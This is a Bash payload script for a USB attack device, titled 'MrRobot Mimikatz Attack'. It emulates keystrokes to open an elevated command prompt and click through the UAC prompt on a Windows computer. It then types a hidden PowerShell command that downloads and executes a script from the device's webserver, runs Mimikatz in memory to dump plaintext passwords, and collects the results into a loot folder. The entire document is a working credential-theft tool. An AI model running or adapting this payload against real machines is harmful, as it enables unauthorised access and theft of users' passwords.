#!/bin/bash # # Title: MrRobot Mimikatz Attack # Author: illwill, El3ct71k # Version: 0.2 # # Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory # with Mimikatz then stashes them in /root/udisk/loot/MrRobot # # Purple......................Setup # Yellow single blink.........Running Powershell / Waiting for WebServer to start # Yellow double blink.........Waiting for server connection and uploading results # Cyan inverted single blink..Starts ethenet attack # Cyan inverted double blink..Starts server to gets results # Green..............Got Creds and copied to loot folder # Red................No Creds LED SETUP # Creating Loot Folders LOOTDIR=/root/udisk/loot/MrRobot mkdir -p $LOOTDIR SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION mkdir -p $SWITCHDIR/loot # HID Attack Starts ATTACKMODE HID # UAC Bypass LED STAGE1 RUN WIN powershell -c "Start-Process cmd -verb runas" Q DELAY 250 Q ENTER Q DELAY 1500 Q LEFTARROW Q DELAY 500 Q ENTER Q DELAY 1500 LED STAGE2 #Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\"" Q DELAY 300 Q ENTER # Ethernet Attack Starts ATTACKMODE RNDIS_ETHERNET LED SPECIAL1 # mount -o sync /dev/nandf /root/udisk iptables -A OUTPUT -p udp --dport 53 -j DROP python $SWITCHDIR/server.py #Wait for EOF in loot folder LED SPECIAL2 while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done; sleep 1 # check for empty lootddd directory, then check results and move them to loot if [ "$(ls -A $SWITCHDIR/loot/)" ]; then if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then LED FAIL mv -v $SWITCHDIR/loot/*.txt $LOOTDIR rm -rf $SWITCHDIR/loot/ else mv -v $SWITCHDIR/loot/*.txt $LOOTDIR rm -rf $SWITCHDIR/loot/ LED FINISH fi else rm -rf $SWITCHDIR/loot/ LED FAIL fi